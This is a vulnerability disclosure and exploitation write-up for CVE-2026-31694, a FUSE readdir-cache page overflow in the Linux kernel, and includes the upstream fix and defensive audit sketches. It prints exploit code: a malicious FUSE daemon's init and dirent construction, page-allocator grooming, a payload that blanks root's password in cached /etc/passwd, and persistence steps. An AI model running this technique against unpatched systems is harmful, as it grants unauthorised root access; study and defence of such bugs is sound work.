Unprivileged root via an out-of-bounds write in the FUSE readdir cache (CVE-2026-31694)

CVE-2026-31694 · Fixed in mainline (51a8de6), 20 April 2026, Cc: stable · Fixes 69e3455 · Latent since 69e3455 (2018) · Affected: v6.16 through the fix · Reported by Qi Tang and Zijun Hu · Fix authored by Samuel Page

Summary

A missing bounds check in fs/fuse/readdir.c lets an unprivileged local user write a controlled 24 bytes past the end of a kernel page and, by landing that write on a cached copy of /etc/passwd, escalate to root. fuse_add_dirent_to_cache() copies a directory entry whose length is taken from the server-controlled namelen field into a single page-cache page. The code checks whether the entry fits in the space remaining on the current page, and if not it advances to a fresh page, but it never checks whether the entry fits in a page at all. A FUSE daemon that returns a dirent with namelen=4095 produces a 4120-byte record, and the 24 bytes past PAGE_SIZE spill into whatever kernel page physically follows.

The FUSE daemon runs as the unprivileged user who mounted the filesystem, and mounting a FUSE filesystem needs no real privilege on a stock desktop, so the whole thing is reachable from an ordinary session with no capabilities, no setuid helper beyond the one every distro ships, and no container escape. The overflow lands in the page allocator’s direct map rather than in a slab object, which means KASAN stays silent and the interesting neighbour is not a heap structure but an adjacent page, including the page cache of a read-only file the kernel already trusts.

The bug is CVE-2026-31694. It was reported by Qi Tang and Zijun Hu and fixed by Samuel Page (with an assist from Bynario AI, per the commit tags), with the patch merged on 20 April 2026. What follows is my own root-cause analysis and exploitation of the bug. The reachability archaeology in particular is the part I find most worth telling.

An unprivileged local attack surface

The overflow happens when the kernel processes a READDIR reply from a FUSE daemon. The daemon is just a userspace program, running as whoever started it, so the question is only whether an unprivileged user can get a FUSE filesystem mounted and serve replies into the readdir cache. On a stock install there are two independent paths, and together they cover essentially every major distribution.

Path A: fusermount3 (setuid root, no namespaces needed)

fusermount3 is the small setuid-root helper that performs the privileged mount(2) on the user’s behalf. It ships by default anywhere GNOME does, because gvfs-fuse depends on fuse3, and gvfs-fuse is pulled in by the ubuntu-desktop metapackage and its equivalents. The specific distros where any unprivileged user can trigger the bug immediately with no setup:

  • Ubuntu (all desktop flavours): fuse3 installed as a dependency of gvfs-fuse, part of the ubuntu-desktop metapackage.
  • Fedora Workstation: fuse3 installed by default for GNOME, Toolbox and Open VM Tools. fusermount3 is present as a setuid-root binary in the default install.
  • Linux Mint: Ubuntu-based, inherits fuse3 via the same gvfs-fuse dependency chain.
  • Any GNOME-based desktop distribution: gvfs-fuse depends on fuse3, so any distro shipping a GNOME desktop will have fusermount3 available to unprivileged users.

The setuid bit is only needed for the initial mount(2) call. The vulnerable code path is entered later, when the user-controlled daemon serves a crafted dirent in response to a READDIR request from the kernel. Nothing about the helper’s hardening is in the way.

Path B: unprivileged user namespaces (no fusermount3 needed)

Since Linux 4.18, an unprivileged user can create a user + mount namespace (unshare -Ufirmp), gain CAP_SYS_ADMIN inside it, open /dev/fuse (typically mode 0666), and mount a FUSE filesystem directly without fusermount3 at all. The readdir overflow corrupts kernel page-cache memory globally regardless of namespace isolation. This path works on any distro that allows unprivileged user namespace creation:

  • Debian (Bullseye and later): kernel.unprivileged_userns_clone has been enabled by default since Debian 11.
  • Arch Linux: enabled by default on standard kernels (linux, linux-lts, linux-zen).
  • RHEL 9 / CentOS Stream 9 / Rocky / Alma: user.max_user_namespaces defaults to a non-zero value (~14803); unprivileged user namespaces are enabled out of the box.
  • Fedora (also covered by Path A on Workstation): enabled by default.

The combination of both paths covers essentially every major Linux distribution out of the box.

Why none of the mitigations work

AppArmor. Ubuntu 24.04 LTS added restrictions on unprivileged user namespaces, but fusermount3 is unconfined on 24.04, so Path A is unaffected. Ubuntu 24.10 and later ship an AppArmor profile for fusermount3 itself (/etc/apparmor.d/fusermount3), but the profile is a path-based allow-list of permitted mount targets. It explicitly permits FUSE mounts under $HOME and $XDG_RUNTIME_DIR (/run/user/$uid/), because GNOME, GVFS, SSHFS, Flatpak, AppImage, Docker-with-FUSE, and fstab-based FUSE mounts all require it. The exploit is insensitive to mount location; the overflow occurs in kernel page-cache memory when the daemon’s reply is processed, so any mount path the profile permits is sufficient to trigger it. Tightening the profile to deny all user-writable mount targets would break the Ubuntu desktop. Throughout 2025 the fusermount3 profile has moved consistently toward being more permissive, because tighter rules kept breaking legitimate workflows.

SELinux. Default policies on RHEL and Fedora do not restrict unprivileged FUSE mounts via either fusermount3 or user namespaces.

seccomp. Not applied to regular user sessions.

The only configurations that actually stop the exploit are removing the setuid bit from fusermount3 and disabling unprivileged user namespaces, both of which break legitimate functionality (Snap, GVFS, SSHFS, rootless containers). No mainstream distro ships either.
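For an administrator who wants to know which of those two configurations a given machine is in, the check can be sketched in a few lines of C. This is a minimal audit sketch, not a complete assessment: the function names are hypothetical, the helper path passed in (for example /usr/bin/fusermount3) is an assumption that varies by distro, and it does not look at Debian's kernel.unprivileged_userns_clone or at AppArmor policy.

```c
#include <assert.h>
#include <stdio.h>
#include <sys/stat.h>

/* Returns 1 if path is a setuid file owned by root, 0 if it is not,
 * and -1 if the file cannot be stat'ed (for example, not installed). */
static int is_setuid_root(const char *path)
{
    struct stat st;

    if (stat(path, &st) != 0)
        return -1;
    return (st.st_mode & S_ISUID) && st.st_uid == 0;
}

/* Reads one integer from a /proc/sys file; returns -1 if unreadable. */
static long read_sysctl_long(const char *path)
{
    FILE *f = fopen(path, "r");
    long value = -1;

    if (!f)
        return -1;
    if (fscanf(f, "%ld", &value) != 1)
        value = -1;
    fclose(f);
    return value;
}

/* Returns 1 if either path described above looks open (a setuid helper is
 * present, or the user-namespace limit is non-zero), 0 if both look closed. */
static int fuse_mount_reachable(const char *helper, const char *userns_sysctl)
{
    return is_setuid_root(helper) == 1 || read_sysctl_long(userns_sysctl) > 0;
}
```

A typical call would be fuse_mount_reachable("/usr/bin/fusermount3", "/proc/sys/user/max_user_namespaces"). A result of 0 only says that these two particular knobs are closed; it says nothing about whether the kernel itself carries the fix.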

So the threat model is the strong one: a normal logged-in user on a default desktop. If you can mount a FUSE filesystem, and you can, you can serve the dirent that triggers the bug.

The readdir cache

When a FUSE directory is opened with FOPEN_CACHE_DIR, the kernel caches the daemon’s directory listing in pages attached to the inode, so subsequent getdents calls can be served without round-tripping to userspace. The reply from the daemon is a packed stream of struct fuse_dirent records: a fixed 24-byte header (inode, offset, namelen, type) followed by namelen bytes of name, and fuse_add_dirent_to_cache() copies each record into the current cache page.

Each record’s serialized size is reclen = FUSE_DIRENT_SIZE(d), which is FUSE_REC_ALIGN(FUSE_NAME_OFFSET + namelen), the header plus the name, rounded up to an 8-byte boundary. The cache is a sequence of PAGE_SIZE pages written at a running offset, and the only placement decision the function makes is whether the next record fits in what is left of the current page.
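The size calculation is easy to reproduce in userspace. The sketch below mirrors the layout described above with hypothetical names (dirent_hdr, NAME_OFFSET, REC_ALIGN, dirent_size); it is a model of the arithmetic, not the kernel's own header.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Userspace mirror of the fixed part of a FUSE dirent: the name follows it. */
struct dirent_hdr {
    uint64_t ino;
    uint64_t off;
    uint32_t namelen;
    uint32_t type;
};

static_assert(sizeof(struct dirent_hdr) == 24, "header is 24 bytes");

#define NAME_OFFSET  sizeof(struct dirent_hdr)
/* Round up to the next multiple of 8, as the record alignment does. */
#define REC_ALIGN(x) (((x) + sizeof(uint64_t) - 1) & ~(sizeof(uint64_t) - 1))

/* Serialized size of one record: header plus name, 8-byte aligned. */
static size_t dirent_size(uint32_t namelen)
{
    return REC_ALIGN(NAME_OFFSET + namelen);
}
```

For example, dirent_size(1) is 32, dirent_size(1024) is 1048, and dirent_size(4095) is 4120, the last of which is the value that matters for the rest of this post.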

The bug: a check that never looks at the whole record

Stripped down, the copy looks like this:

/* fuse_add_dirent_to_cache(), simplified, pre-fix */

reclen = FUSE_DIRENT_SIZE(dirent);      /* FUSE_REC_ALIGN(FUSE_NAME_OFFSET + namelen) */

if (offset + reclen > PAGE_SIZE) {       /* does it fit in what's left of this page? */
        index++;                        /* no: advance to a fresh page   */
        offset = 0;                     /*     and start at the top of it */
}

addr = kmap_local_page(page[index]) + offset;
memcpy(addr, dirent, reclen);           /* reclen is never compared to PAGE_SIZE itself */

The check answers one question (“does this record fit in the remaining space?”) and handles a “no” by moving to a clean page and resetting offset to 0. That is correct as long as a record can always fit in a page once it has one to itself. The function simply assumes that. It never asks whether reclen exceeds PAGE_SIZE, so when offset is reset to 0 and the memcpy runs, a record larger than a page writes straight off the end of the fresh page.

With namelen at the maximum the protocol now allows, that is exactly what happens:

reclen   = FUSE_REC_ALIGN(FUSE_NAME_OFFSET + namelen)
         = FUSE_REC_ALIGN(24 + 4095)
         = 4120

overflow = 4120 - 4096 = 24 bytes

The overflowing 24 bytes are the tail of dirent->name[], which the daemon controls completely. So this is a linear, fixed-size, fully-controlled write off the end of one page into the start of the next.
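The placement decision can be modelled without touching any memory at all. The following is a hypothetical userspace model of the pre-fix logic (the names MODEL_PAGE_SIZE and place_record_unchecked are mine, not the kernel's); it only tracks the running offset and reports how many bytes of a record would fall past the end of the page.

```c
#include <assert.h>
#include <stddef.h>

#define MODEL_PAGE_SIZE 4096u

/* Model of the pre-fix placement: if the record does not fit in what is
 * left of the current page, restart at offset 0 of a fresh page. Returns
 * the number of bytes that would land past the end of the page used.
 * No memory is written; this is arithmetic only. */
static size_t place_record_unchecked(size_t *offset, size_t reclen)
{
    size_t end;

    if (*offset + reclen > MODEL_PAGE_SIZE)
        *offset = 0;                    /* fresh page, no size check */

    end = *offset + reclen;
    *offset = end;
    return end > MODEL_PAGE_SIZE ? end - MODEL_PAGE_SIZE : 0;
}
```

Any record of at most 4096 bytes yields 0 regardless of the starting offset, which is why the check looked sufficient for so long. A 4120-byte record yields 24 regardless of the starting offset, because the reset to 0 always happens first.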

[Figure: a 24-byte write past the end of the page. With namelen=4095, reclen = FUSE_REC_ALIGN(24 + 4095) = 4120 B, which is larger than the 4096 B readdir cache page it is copied into; the last 24 B land in the adjacent kernel page (page cache, e.g. /etc/passwd). The check advances to a fresh page when the record will not fit the remaining space; it never rejects a record that cannot fit any single page. Not to scale.]
A record larger than a page is copied at offset 0 of a fresh page; the tail spills into the next page.

Six years dormant: how the bug got armed

The interesting part of this bug is that the missing check is not new. It has been wrong since the readdir cache was introduced. It was simply unreachable for six years, and was quietly armed by a commit that had nothing to do with it.

The cache, and this exact fits-in-remaining-space check, arrived in commit 69e34551152a (“fuse: allow caching readdir”, Miklos Szeredi, October 2018, first in v4.20). At the time FUSE_NAME_MAX was 1024, so the largest record a daemon could produce was FUSE_REC_ALIGN(24 + 1024) = 1048 bytes, about a quarter of a page. A record could never approach PAGE_SIZE, so the absence of a reclen > PAGE_SIZE check made no difference. The assumption (“any single record fits in a page”) was true, just never written down.
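Had the assumption been written down, it might have looked something like the sketch below. This is an illustration in userspace C11 with hypothetical macro names; in-kernel code would more plausibly use BUILD_BUG_ON for the constant case, and nothing here is taken from the actual source.

```c
#include <assert.h>
#include <stddef.h>

#define INV_PAGE_SIZE    4096u
#define INV_NAME_OFFSET  24u
#define INV_REC_ALIGN(x) (((x) + 7u) & ~7u)

/* Largest serialized record for a given name-length ceiling. */
#define MAX_RECLEN(name_max) INV_REC_ALIGN(INV_NAME_OFFSET + (name_max))

/* The 2018 invariant, stated at build time for the 1024-byte ceiling. */
static_assert(MAX_RECLEN(1024u) <= INV_PAGE_SIZE,
              "a maximal dirent must fit in one cache page");

/* Runtime form, for a ceiling that is negotiated per connection. */
static int max_record_fits_page(unsigned name_max)
{
    return MAX_RECLEN(name_max) <= INV_PAGE_SIZE;
}
```

With a ceiling of 1024 the assertion holds with room to spare. The largest ceiling for which it still holds is 4072, since 24 + 4072 is exactly one page.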

It stopped being true in commit 27992ef80770d (“fuse: Increase FUSE_NAME_MAX to PATH_MAX”, Bernd Schubert, December 2024, first in v6.15). That change adds a per-connection fc->name_max, initialised to the old 1024 and raised to PATH_MAX - 1 (4095) after FUSE_INIT negotiation once the daemon advertises max_pages > 1. Since the daemon is attacker-controlled, that gate is no gate at all. The commit dutifully updates the length checks in fuse_notify_inval_entry, fuse_notify_delete and fuse_lookup_name to use the new limit, but it never touches fs/fuse/readdir.c, because nobody connected a name-length ceiling to a readdir-cache page-boundary check three files away. With the ceiling raised, reclen reaches 4120, and the latent 2018 bug becomes a 24-byte controlled overflow.

[Figure: timeline. Latent for six years, armed by an unrelated commit: the missing check shipped in 2018 but was unreachable until FUSE_NAME_MAX was raised in 2024.]

  • Oct 2018 · v4.20 · 69e3455 (allow caching readdir): adds the cache and the check. NAME_MAX is 1024, so max reclen ≈ 1048 B ≤ page. Latent, unreachable.
  • Dec 2024 · v6.15 · 27992ef (raise FUSE_NAME_MAX to PATH_MAX): name_max becomes 4095 and readdir.c is untouched, so max reclen is 4120 B > page. Reachable and exploitable.
  • Apr 2026 · 51a8de6 (reject oversized dirents): adds the reclen > PAGE_SIZE check. Fix: S. Page.

A name-length ceiling raised in one file turned a six-year-old check in another into a page overflow.

Why the sanitizers stay quiet

The reflex with a kernel heap overflow is to reach for KASAN, and the reflex is wrong here. KASAN guards slab objects and stack frames with poisoned redzones and a quarantine on freed allocations: an overflow that runs off the end of a kmalloc object trips a redzone and gets a clean report. This overflow does neither. The readdir cache pages come from the page allocator, and the bytes that follow them in the direct map are simply the next page, not a slab object, not a redzone, nothing KASAN instruments. The 24-byte write crosses no boundary the sanitizer is watching, so it reports nothing.

The bug is both quiet and useful for the same reason. Fuzzing a FUSE daemon against a KASAN kernel will not flag it. The first visible symptom is downstream: a corrupted neighbour, an unexplained oops if the adjacent page was something the kernel needed, or nothing at all if the adjacent page was cached file data and you only changed its contents. Page-cache pages are valid targets, and rewriting one rewrites file contents the kernel will go on to trust.

Exploitation

This bug gives a constrained primitive: exactly 24 bytes, at a fixed offset (byte 0 of the page that physically follows the cache page), with content the daemon fully controls. It is not a write-what-where. There is no control over length, no freedom over placement within the victim page, and no ability to skip pages. It is a linear spill off one page into the next, and whether it is useful at all depends entirely on what sits at that next physical page frame.

A different kind of overflow

The exploitation shape here is fundamentally different from a slab overflow, and the difference dictates everything that follows.

In a slab overflow (the more common case) you are writing past the end of one kmalloc object into the header or body of the next object in the same cache. The victim is a struct, and the game is type confusion: you pick a target struct that lives in the same size class, spray it into adjacent slots, and corrupt specific fields (a function pointer, a refcount, a flags word). The allocator’s freelist ordering is your leverage, and your tooling (KASAN, SLUB debug, freelist randomisation) is designed around exactly this scenario.

Here the overflow does not land in a slab at all. The readdir cache pages are plain page-allocator pages (alloc_page(GFP_KERNEL)), and the 24 bytes that spill off the end land on whatever page is at the next physical page frame number in the kernel’s direct map. That is not a slab object with redzones; it is a raw 4096-byte page that could be anything: a page-cache page backing a file, an anonymous page belonging to a process, a page table page, a free page on a buddy list, or another slab page viewed from the outside rather than the inside. KASAN does not instrument the gaps between page-allocator pages, so the overflow is invisible to the sanitizer. And the target is not a struct field at a known offset within an object. It is the first 24 bytes of an entire page, meaning whatever data structure starts at that page’s base address gets its head overwritten.

So the interesting targets here are not kernel structs but kernel pages, and the most interesting kernel pages are the ones where overwriting byte 0 has a semantic effect the kernel will act on. That points directly at the page cache.

Why the page cache is the natural target

The page cache is the kernel’s in-memory copy of file data. When a process reads /etc/passwd, the kernel reads the block from disk into a page-cache page, and from then on every process that reads the same file, including privileged programs such as su and the PAM modules behind it, reads from that cached page. The page is not copied per-reader; there is one shared copy, and its contents are trusted as authoritative until it is evicted or the file is written through the filesystem layer.

Corrupting a page-cache page does not write back to disk. It does not trip any filesystem permission check, because the corruption never passes through write(2) or the VFS. It does not mark the page dirty, because the modification happens through a direct-map alias rather than through the filesystem’s address space operations. The kernel simply does not know the page has changed. Every subsequent reader, including privileged daemons that parse the file to make security decisions, sees the corrupted version.

This is the same end state DirtyPipe (CVE-2022-0847) achieved, via a completely different mechanism. DirtyPipe abused a stale PIPE_BUF_FLAG_CAN_MERGE flag to trick the pipe subsystem into merging attacker data into a spliced page-cache page. It was a logic bug in pipe buffer management. This one is a memcpy that writes 24 bytes off the end of a page-allocator page. The route is different; the destination is the same: the cached page of a file you cannot write to, rewritten without the kernel noticing.
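One practical consequence for defenders is that this kind of corruption shows up as a disagreement between the cached copy of a file and the copy on disk. The sketch below compares the first 4096 bytes of a file read normally against the same range read with O_DIRECT. It is a rough detection idea under stated assumptions: the function name is hypothetical, O_DIRECT is not supported on every filesystem, a 4096-byte aligned buffer is assumed to satisfy the device's alignment rules, and a legitimate write racing with the check can produce a false positive.

```c
#define _GNU_SOURCE             /* for O_DIRECT */
#include <assert.h>
#include <fcntl.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define CMP_LEN 4096

/* Returns 1 if the cached first page differs from a direct read of the
 * same range, 0 if they match, -1 on error or if O_DIRECT is unsupported. */
static int first_page_diverges(const char *path)
{
    char cached[CMP_LEN];
    void *direct = NULL;
    int result = -1;
    ssize_t nc, nd;

    int cfd = open(path, O_RDONLY);             /* served from the page cache */
    int dfd = open(path, O_RDONLY | O_DIRECT);  /* bypasses the page cache    */

    if (cfd < 0 || dfd < 0 || posix_memalign(&direct, CMP_LEN, CMP_LEN) != 0)
        goto out;

    nc = pread(cfd, cached, CMP_LEN, 0);
    nd = pread(dfd, direct, CMP_LEN, 0);
    if (nc < 0 || nd < 0)
        goto out;

    result = (nc != nd) || memcmp(cached, direct, (size_t)nc) != 0;
out:
    free(direct);
    if (cfd >= 0)
        close(cfd);
    if (dfd >= 0)
        close(dfd);
    return result;
}
```

A return value of 1 for a file such as /etc/passwd on an otherwise idle system would be worth investigating; a return value of 0 only says the two views agreed at the moment of the check.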

Why /etc/passwd and why 24 bytes is enough

The target file needs to satisfy three constraints: it must be small enough that its first page covers the interesting content, it must be read by a privileged process that will act on the corrupted data, and the corruption must be achievable in 24 bytes starting at byte 0 of the page. /etc/passwd is the textbook fit.

A stock /etc/passwd begins with the root entry on line 1. The format is colon-delimited: root:x:0:0:root:/root:/bin/bash\n. The x in the password field means “look in /etc/shadow.” If that field is empty (root::0:0:...), PAM treats the account as having no password, and on Ubuntu, Debian and Arch the default pam_unix configuration includes nullok, which accepts an empty password for su. So the goal is to replace the first line of /etc/passwd with a root entry whose password field is blank.
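The distinction between the two forms of the password field is mechanical, which also makes it easy to audit for. The following sketch classifies the second colon-delimited field of a passwd line; the enum and function names are hypothetical, and it is a simplified parser rather than a reimplementation of what the C library or PAM does.

```c
#include <assert.h>
#include <string.h>

enum pw_field {
    PW_MALFORMED = -1,  /* fewer than two colons on the line          */
    PW_EMPTY     = 0,   /* "name::..."  : no password required        */
    PW_SHADOW    = 1,   /* "name:x:..." : look in /etc/shadow         */
    PW_OTHER     = 2    /* anything else, e.g. a hash or a lock mark  */
};

/* Classifies the password field (second field) of one passwd line. */
static enum pw_field classify_passwd_field(const char *line)
{
    const char *first = strchr(line, ':');
    const char *second;
    size_t len;

    if (!first)
        return PW_MALFORMED;
    second = strchr(first + 1, ':');
    if (!second)
        return PW_MALFORMED;

    len = (size_t)(second - first - 1);
    if (len == 0)
        return PW_EMPTY;
    if (len == 1 && first[1] == 'x')
        return PW_SHADOW;
    return PW_OTHER;
}
```

Run over each line of /etc/passwd, a PW_EMPTY result for a UID 0 account is the condition an integrity monitor would want to alert on.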

The overflow writes 24 bytes at byte 0 of the victim page, which is byte 0 of the file’s cached content, which is the start of line 1. Twenty-four bytes is enough to write a complete, parseable root entry with a blank password field and a valid shell:

root::0:0:x:.:\n#######\n
|____________| |______|
   new root     comment absorber (# hides the truncated remains of the old line)

That is 23 bytes of meaningful content plus a trailing newline to pad to the controlled region. The # characters on the second “line” begin a comment in the passwd format, absorbing whatever partial text remains from the old root entry so the file still parses cleanly. After the overflow, su root with an empty password returns a root shell.

Triggering the overflow

Before the page-level grooming matters at all, the exploit has to get the kernel to copy a 4120-byte dirent into a cache page. That requires a FUSE filesystem whose daemon speaks the right protocol version to unlock the raised name_max, and a readdir reply containing the oversized entry.

The daemon mounts the filesystem via fusermount3: fork, exec fusermount3 <mountpoint> with the _FUSE_COMMFD environment variable pointing at a socketpair, and receive the /dev/fuse file descriptor back over SCM_RIGHTS. From there the daemon handles FUSE requests by reading from the fd and writing replies back.

The critical negotiation happens in FUSE_INIT. The kernel sends its version and capability flags; the daemon replies with its own. The field that matters is max_pages: if the daemon advertises max_pages > 1, the kernel raises fc->name_max from the old 1024 to PATH_MAX - 1 (4095). Without this, parse_dirfile rejects names longer than 1024 and the overflow is unreachable. Setting it is one line in the init reply:

struct fuse_init_out out = {0};
out.major = FUSE_KERNEL_VERSION;
out.minor = FUSE_KERNEL_MINOR_VERSION;
out.max_pages = 2;              /* triggers name_max = PATH_MAX - 1 = 4095 */
out.max_write = 4096;
fuse_reply(unique, 0, &out, sizeof(out));

Once name_max is raised, the daemon needs to serve a directory whose listing triggers the cache path. It opens directories with FOPEN_CACHE_DIR set in the OPENDIR reply’s open_flags, telling the kernel to cache the listing in pages. Each attempt uses a fresh directory name (trigdir_1, trigdir_2, …) looked up via LOOKUP with a fresh node ID, so each readdir populates a new cache page and the exploit never writes into a page it has already overflowed.

The oversized dirent itself is a single struct fuse_dirent with namelen = 4095. The name is 4095 bytes of padding, with the 24-byte payload placed at exactly the position that will spill past the page boundary. The header is 24 bytes (FUSE_NAME_OFFSET), so byte 0 of the name starts at byte 24 of the record, and the page boundary falls at byte 4096 of the record, which is byte 4096 - 24 = 4072 of the name. Everything from name byte 4072 onward overflows into the adjacent page:

struct fuse_dirent *d = (struct fuse_dirent *)buf;
d->ino = 1000;
d->off = 1;
d->namelen = 4095;                           /* FUSE_NAME_MAX after INIT */
d->type = DT_REG;
memset(d->name, 'A', 4095);                 /* padding */
memcpy(d->name + (PAGE_SIZE - FUSE_NAME_OFFSET),  /* byte 4072 of name = byte 4096 of record */
       payload, 23);                         /* the 24 bytes that land on the next page */

The grooming window

The exploit needs a window between triggering the readdir and the daemon actually replying, a gap where it can set up the page-level grooming before the overflow runs. FUSE gives this for free, because the protocol is synchronous from the daemon’s perspective: the kernel writes a FUSE_READDIR request to the fd, and blocks the calling thread until the daemon writes a reply. The daemon controls when that reply happens.

The exploit runs the trigger in a separate thread that opens a directory under the mountpoint (which sends the READDIR to the daemon), while the daemon’s READDIR handler blocks on a condition variable instead of replying immediately. The main thread waits for a signal that the readdir has arrived, performs all the grooming (memory pressure, page eviction, pool setup) and only then signals the daemon to release its reply. The dirent is copied into the cache page at the exact moment the adjacent page is the one the exploit wants to hit:

/* daemon side: READDIR handler */
static void handle_readdir(struct fuse_in_header *h, void *body) {
    struct fuse_read_in *ri = body;
    if (ri->offset != 0) { fuse_reply(h->unique, 0, NULL, 0); return; }

    pthread_mutex_lock(&mtx);
    readdir_arrived = 1;
    pthread_cond_signal(&cond_arrived);          /* tell main: request is here     */
    while (!readdir_respond)
        pthread_cond_wait(&cond_respond, &mtx);  /* block until main says go       */
    readdir_respond = 0;
    readdir_arrived = 0;
    pthread_mutex_unlock(&mtx);

    fuse_reply(h->unique, 0, dirent_buf, 4120);  /* now reply with the oversized dirent */
}

This is the FUSE equivalent of the ioctl-staggering in the DRM exploit’s race calibration: it turns a timing-dependent operation into a sequenced one. The daemon does not race the kernel; it holds the kernel’s thread until the grooming is done, then releases the reply at the right moment.

Placement: getting the right page at PFN+1

The entire exploit reduces to one placement problem: at the instant the FUSE daemon replies with the oversized dirent, the page at PFN+1 relative to the readdir cache page must be the cached first page of /etc/passwd.

The page allocator’s default behaviour works against this: the per-CPU page (PCP) lists buffer recently freed pages and hand them back in LIFO order, which makes the physical relationship between consecutive allocations unpredictable. But when the PCP lists are empty, allocations fall through to the buddy allocator, which splits higher-order blocks into physically contiguous pairs. Two consecutive alloc_page calls served from the same order-1 buddy split are guaranteed to be at adjacent PFNs, and a write off the end of the lower one lands on the higher one.

So the strategy is: drain the PCP lists, then orchestrate the two allocations (the readdir cache page and the passwd page-cache page) so they come from the same split. The exploit does this in four stages.

First, drain. The exploit reads /proc/meminfo, computes roughly 10% of MemFree, and holds that much memory in large mmap(MAP_POPULATE) blocks. It is not a precision instrument; it just needs to exhaust the PCP freelists and force allocations down to the buddy path. The blocks are touched (a volatile write to the first and last page of each) to make sure they are faulted and actually consume physical pages:

long free_kb = /* from /proc/meminfo MemFree: line */;
int drain_nblocks = (free_kb / 10) * 1024 / DRAIN_BLOCK_SIZE;

for (int i = 0; i < drain_nblocks; i++) {
    drain[i] = mmap(NULL, DRAIN_BLOCK_SIZE,
                    PROT_READ | PROT_WRITE,
                    MAP_PRIVATE | MAP_ANONYMOUS | MAP_POPULATE, -1, 0);
    *(volatile char *)drain[i] = (char)i;                         /* fault first page  */
    *(volatile char *)(drain[i] + DRAIN_BLOCK_SIZE - PAGE_SIZE) = (char)i; /* fault last */
}

Second, pool. After the drain, the exploit allocates a pool of 128 single-page mmap(MAP_POPULATE) mappings. With the PCP lists empty, these come from buddy splits, and consecutive pool entries are likely at consecutive PFNs. The pool is a reservoir of adjacent page pairs the exploit can use:

for (int i = 0; i < POOL_SIZE; i++) {
    pool[i] = mmap(NULL, PAGE_SIZE,
                   PROT_READ | PROT_WRITE,
                   MAP_PRIVATE | MAP_ANONYMOUS | MAP_POPULATE, -1, 0);
    *(volatile char *)pool[i] = (char)i;
}

Third, target. The exploit picks a consecutive pair from the pool: pool[idx] (the “before” page, which will become the readdir cache page) and pool[idx+1] (the “after” page, which will become the passwd page). It evicts /etc/passwd from the page cache with posix_fadvise(fd, 0, 0, POSIX_FADV_DONTNEED), then frees the “after” page with munmap. The next time anything reads /etc/passwd, the kernel allocates a fresh page for the cache, and with the PCP lists drained, that allocation is likely to land on the PFN just freed. A pread of one byte forces the re-fault:

int passwd_fd = open("/etc/passwd", O_RDONLY);
posix_fadvise(passwd_fd, 0, 0, POSIX_FADV_DONTNEED);   /* evict from page cache      */
munmap(pool[idx + 1], PAGE_SIZE);                       /* free the "after" PFN       */
pread(passwd_fd, &tmp, 1, 0);                           /* re-fault: passwd → after PFN */

Fourth, fire. The exploit frees the “before” page (munmap(pool[idx])) and then signals the daemon to release its readdir reply. The kernel allocates a cache page for the readdir data, and with the PCP drained that allocation is likely to land on the PFN just freed. The 4120-byte memcpy fills the cache page and spills 24 bytes into PFN+1, which is now the page-cache page of /etc/passwd.

[Figure: page-level grooming, three steps to adjacency. Drain PCP, build a pool of buddy-split pairs, then swap the target page into position.]

  1. Pool from buddy splits (PCP drained): pool[idx] and pool[idx+1] sit at consecutive PFNs from the same buddy split.
  2. Evict passwd, free pool[idx+1], re-fault: DONTNEED + munmap + pread put the /etc/passwd page-cache page on the freed PFN.
  3. Free pool[idx], signal the daemon: the readdir cache page lands on the freed “before” PFN. The memcpy runs 4120 bytes: 4096 fill the cache page, and 24 spill into the “after” PFN, now the page-cache page of /etc/passwd.

Build a pool of adjacent pages from buddy splits; swap the target into position; overflow into it.

Warmup and validation

Before attempting the real /etc/passwd corruption, the exploit runs a warmup phase to validate that the overflow is landing where it expects. It builds a dirent with a 23-byte marker string (DEADBEEF_OOB_WRITE_HIT!) as the payload instead of the passwd entry, and runs the same grooming sequence against its own pool pages: allocate a consecutive pair, write a known pattern into the “after” page, free the “before” page, trigger the readdir, and check whether the marker appeared at byte 0 of the “after” page. If it did, the adjacency assumption held and the overflow landed correctly.

The exploit runs five warmup rounds. If none hit, it aborts: the memory configuration is not cooperating and there is no point corrupting /etc/passwd probabilistically without first confirming the primitive works. If at least one hits, the system’s physical layout is favourable and the exploit switches to the real payload. This is the same “validate your primitive before committing” discipline as the DRM exploit’s leak-verification step: better to waste a few iterations confirming the setup than to fire the destructive payload into the wrong page.

Post-exploitation

After the overflow lands, the page-cache copy of /etc/passwd reads root::0:0:x:.: on its first line. su root with an empty password succeeds. The exploit backs up the original /etc/passwd before the first attempt (read into memory and written to /tmp/.passwd_backup), then uses the root shell to write a clean passwordless-root entry to disk (the first line replaced, the rest of the file preserved from the backup), drops the page cache with echo 3 > /proc/sys/vm/drop_caches so the corrupted cached page is discarded, and drops into an interactive root shell. The on-disk file now has a persistent passwordless root entry; the page-cache corruption is gone.

On the two systems I tested (a 1 GB QEMU guest running 7.0.0-rc4 and a bare-metal 16 GB Ubuntu 24.04 box on 6.17) the exploit lands root consistently within one to ten attempts. The variation comes from the inherent non-determinism of the page allocator under memory pressure; the median is around three attempts. Over repeated runs it has never failed outright, though the attempt count varies with system memory configuration and background allocation noise.

The fix

The fix is the one check the 2018 code was missing: before copying, reject any record that cannot fit in a single page.

 if (offset + reclen > PAGE_SIZE) {
+        if (reclen > PAGE_SIZE)
+                return;
         index++;
         offset = 0;
 }

No interface is reworked and nothing is restructured. The assumption that was always implicit (“a record fits in a page”) is simply made explicit and enforced. It is a smaller fix than the one the DRM change_handle bug needed, because there is nothing compound to serialise here; the function was only ever missing a comparison. The change landed upstream as 51a8de6c50bf9 (“fuse: reject oversized dirents in page cache”, authored by Samuel Page, signed off by Miklos Szeredi and Christian Brauner) on 20 April 2026, and was Cc’d to stable; the backports went out across the stable trees over the following weeks.
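The effect of the added comparison can be seen in a small userspace model of the placement logic. As before, this is a hypothetical sketch (struct cache_pos and place_record_checked are my names) that tracks only the page index and running offset; it is not the kernel function.

```c
#include <assert.h>
#include <stddef.h>

#define FIX_PAGE_SIZE 4096u

/* Position of the next record in the modelled cache. */
struct cache_pos {
    size_t index;   /* which page                 */
    size_t offset;  /* running offset within page */
};

/* Model of the post-fix placement. Returns 1 if the record is cached,
 * 0 if it is rejected because it cannot fit in any single page. */
static int place_record_checked(struct cache_pos *pos, size_t reclen)
{
    if (pos->offset + reclen > FIX_PAGE_SIZE) {
        if (reclen > FIX_PAGE_SIZE)
            return 0;               /* the added check: never copy it */
        pos->index++;
        pos->offset = 0;
    }
    pos->offset += reclen;          /* stands in for the memcpy */
    return 1;
}
```

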